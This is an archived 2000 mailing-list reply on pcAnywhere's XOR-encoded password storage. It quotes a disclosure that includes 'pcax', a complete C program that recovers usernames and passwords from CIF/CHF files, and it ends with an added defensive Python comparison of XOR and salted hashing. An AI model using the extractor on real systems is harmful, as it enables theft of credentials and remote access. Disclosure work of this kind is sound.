Subject: Re: pcAnywhere weak passwords encryption in configuration files
From: Seth R Arnold (sarnold at WILLAMETTE.EDU)
Date: Thu May 04 2000 - 17:48:06 CDT
- Next message: Ron DuFresne: "Re: firewall audit"
- Previous message: Granquist, Lamont: "Re: ethernet cards & promisc mode"
- In reply to: Pascal Longpre: "pcAnywhere weak passwords encryption in configuration files"
- Reply: Seth R Arnold: "Re: pcAnywhere weak passwords encryption in configuration files"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Pascal, it could be that where the passwords are being used, XOR
is as strong as is possible -- if the passwords are being saved
as a convenience for the client, then any way they store the
password is necessarily going to be equivalent to XOR unless
they store the passwords encrypted with a secret known only by
the user -- and if they are being stored as a convenience,
asking the user for a secret isn't going to be convenient.
However, if this is on the server end of things (i.e., it
authenticates users) then storing the passwords in a XOR form is
simply poor taste, poor design, and poor security.
Perhaps Symantec could comment to either vuln-dev or bugtraq wrt
how they use their passwords, especially since there seem to be
many in their user community who feel passwords are being
handled insecurely.
* Pascal Longpre <longprep at HOTMAIL.COM> [000504 15:32]:
> Another pcAnywhere vulnerability...
>
> --- Discussion ---
> PcAnywhere uses a trivial password encryption scheme (XOR
> based, again!!!) to store account and password information
> in the configuration file. CIF files are used to store
> callers' information and CHF files are used to record remote
> slaves' information (username, pw and domain) in order to
> automate the process of logging in.
> A second level of protection (protect item password) has
> also been added on those files to protect the viewing of
> properties.
>
> In a network environment, the CIF files are usually stored
> on a centralized file server for easier management and every
> slave must have read access to them. Having access to CIF
> information can give an attacker a way to access any waiting
> pcAnywhere host on that network.
>
> In CHF files, even if you uncheck the "Automatically login
> to host..." option, the first character of every field is
> replaced with a space but the rest of the field's
> information remains in the file.
>
> --- Solution ---
> Symantec suggests the use of the public key encryption
> option. I'm told this is poorly documented. I never saw
> anyone use this. They also suggest using any third party
> encryption software but I don't see how this can fit in a
> network environment.
>
> --- Exploit ---
> The following program will extract the username, password
> and the Protect Item password from any CIF or CHF file. It
> should work fine with versions 7.5 to 9.2.
>
> // pcax - pcAnywhere password extraction program
> // This program extracts account information from CIF and CHF files.
> //
> // Written by Pascal Longpre (longprep at hotmail.com)
> // Date : April 27th, 2000
> // Tested on pcAnywhere version 7.5 to 9.2
>
> #include <windows.h>
> #include <stdio.h>
> #include <stdlib.h>   /* exit() */
> #include <string.h>   /* strstr(), memset() */
>
> int main(int argc, char **argv) {
>
>     char szBuffer[3072];
>     /* One spare byte each so the extracted fields can be NUL-terminated */
>     char UserName[33], Password[17], Pw2[16];
>     int i, BytesRead;
>     FILE *stream;
>
>     printf("pcax - pcAnywhere password extractor\n");
>     printf("Written by Pascal Longpre - longprep at hotmail.com\n");
>     printf("\n");
>     if (argc < 2) {
>         printf("USAGE : pcax filename\n");
>         printf(" where filename is any .cif or .chf file\n");
>         printf("\n");
>         exit(1);
>     }
>
>     // Open the file in binary mode; the program only reads it
>     stream = fopen(argv[1], "rb");
>     if (stream == NULL) {
>         perror(argv[1]);
>         exit(1);
>     }
>     // Zero the buffer first so a short file yields zeros, not stack garbage
>     memset(szBuffer, 0, sizeof(szBuffer));
>     BytesRead = fread(szBuffer, 1, sizeof(szBuffer), stream);
>     fclose(stream);
>
>     // Extract CIF file account information
>     if (strstr(argv[1], ".cif") != NULL || strstr(argv[1], ".CIF") != NULL)
>     {
>         for (i = 0; i < 32; i++)
>             UserName[i] = szBuffer[0x1cc + i - 1] ^ szBuffer[0x1cc + i] ^ (0xF + i);
>         UserName[32] = '\0';
>         printf("Username :%s\n", UserName);
>
>         for (i = 0; i < 16; i++)
>             Password[i] = szBuffer[0x24d + i - 1] ^ szBuffer[0x24d + i] ^ (0x90 + i);
>         Password[16] = '\0';
>         printf("User password :%s\n", Password);
>     }
>
>     // Extract CHF files account information
>     if (strstr(argv[1], ".chf") != NULL || strstr(argv[1], ".CHF") != NULL)
>     {
>         for (i = 0; i < 32; i++)
>             UserName[i] = szBuffer[0x82d + i - 1] ^ szBuffer[0x82d + i] ^ (0x70 + i);
>         UserName[32] = '\0';
>         printf("Username :%s\n", UserName);
>
>         // 14 characters, starting one byte into the field
>         for (i = 1; i < 15; i++)
>             Password[i - 1] = szBuffer[0x8ad + i - 1] ^ szBuffer[0x8ad + i] ^ (0xf0 + i);
>         Password[14] = '\0';
>         printf("Password :%s\n", Password);
>     }
>
>     // Protected item password - Same offset for both files
>     for (i = 0; i < 16; i++)
>         Pw2[i] = szBuffer[0x118 + i - 1] ^ szBuffer[0x118 + i] ^ (0x17 + i);
>     Pw2[15] = '\0';
>     printf("Protected item password :%s\n", Pw2);
>     return 0;
> }
> // The end
>
> Thanks to Justin Somaini (reilly at speakeasy.org) for giving
> me the idea to investigate those config. files.
>
> Pascal Longpre (longprep at hotmail.com)
--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
'Netscape engineers are weenies!' -- Microsoft
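The distinction Seth draws above, between a credential stored for the client's convenience (where any reversible scheme is no stronger than XOR) and a server-side authenticator (which should never hold a recoverable password), as an added example in Python. This is not code from the original post, from Seth, or from pcAnywhere; the fixed key stream, the sample password and the field layout are constructed for illustration and do not correspond to pcAnywhere's real files or offsets. It also picks up Pascal's note about the unchecked "Automatically login to host..." option and shows why blanking only the first byte of a field leaves the rest of the value on disk.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed key stream standing in for a key embedded in the program.
# Assumption for illustration only; it is not pcAnywhere's scheme or offsets.
FIXED_KEY = bytes([0x17, 0x3A, 0x5C, 0x91, 0xE2, 0x08, 0x44, 0xB7])


def xor_obfuscate(secret: bytes) -> bytes:
    """XOR each byte with the fixed key stream. Reversible by construction."""
    return bytes(b ^ FIXED_KEY[i % len(FIXED_KEY)] for i, b in enumerate(secret))


def xor_deobfuscate(blob: bytes) -> bytes:
    """Inverse of xor_obfuscate. It is the same operation and needs no secret,
    so anyone who can read the file and the program recovers the value."""
    return xor_obfuscate(blob)


# Server-side alternative: keep only a salted, slow, one-way verifier.
PBKDF2_ITERATIONS = 200_000


def make_verifier(password: str, salt: Optional[bytes] = None) -> dict:
    """Derive a verifier from which the password cannot be read back."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return {"salt": salt, "iterations": PBKDF2_ITERATIONS, "digest": digest}


def verify_password(candidate: str, record: dict) -> bool:
    """Recompute the derivation and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(digest, record["digest"])


# Clearing a stored field: the post reports that only the first character is
# replaced with a space, leaving the rest of the value in the file.
def blank_first_byte_only(field: bytes) -> bytes:
    """Reproduces the reported behaviour: the tail of the old value survives."""
    return b" " + field[1:]


def clear_field(field: bytes) -> bytes:
    """Overwrite the whole fixed-width field so none of the old value remains."""
    return b"\x00" * len(field)


def residue_remains(cleared: bytes, original: bytes) -> bool:
    """True when the original value beyond its first byte is still present."""
    return len(original) > 1 and original[1:] in cleared


def demo() -> dict:
    """Run the comparisons on a constructed sample password; every value is True."""
    pw = "s3cret-example"  # constructed sample, not a real credential
    raw = pw.encode("utf-8")
    blob = xor_obfuscate(raw)
    record = make_verifier(pw)
    return {
        "xor_changes_bytes": blob != raw,
        "xor_recoverable_without_secret": xor_deobfuscate(blob) == raw,
        "verifier_accepts_correct": verify_password(pw, record),
        "verifier_rejects_wrong": not verify_password(pw + "x", record),
        "half_clear_leaks": residue_remains(blank_first_byte_only(raw), raw),
        "full_clear_clean": not residue_remains(clear_field(raw), raw),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The XOR pair shows why a reversible transform with a program-embedded key offers no confidentiality against anyone who can read the file: decoding is the same operation as encoding. The verifier functions show the server-side alternative Seth has in mind, where the stored record lets the host check a password without being able to return it, and `hmac.compare_digest` keeps the comparison constant-time. The clearing helpers show that disabling a stored credential means overwriting the entire field, not just its first byte.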